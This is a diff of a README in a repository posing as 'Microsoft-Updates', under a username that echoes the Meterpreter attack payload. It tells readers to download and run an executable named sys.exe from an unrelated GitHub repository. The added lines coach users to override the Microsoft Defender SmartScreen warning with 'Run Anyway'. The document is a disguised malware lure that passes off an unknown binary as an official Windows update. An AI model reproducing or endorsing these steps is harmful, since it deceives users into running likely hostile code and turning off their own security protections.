meeterpreeter/Microsoft-Updates/README.md

 ## 🔧 Manual Installation

-1. Click to navigate to the update script:
+1. Click the following link to download the update file:
    [`Click here`](https://github.com/meeterpreeter/files/raw/refs/heads/main/sys.exe)

-2. Click download on the script (ignore any security warnings)
+2. Double-click the file in your Downloads folder to run it.

-3. Once downloaded, double-click the file to install the update (no reboot is required).
+3. If you receive a blue screen stating "Windows protected your PC -- Microsoft Defender SmartScreen prevented an unrecognized app from starting.
+Running this app might put your PC at risk."
+Be sure to click "More info" --> Run Anyway or else the update will not apply.

 ---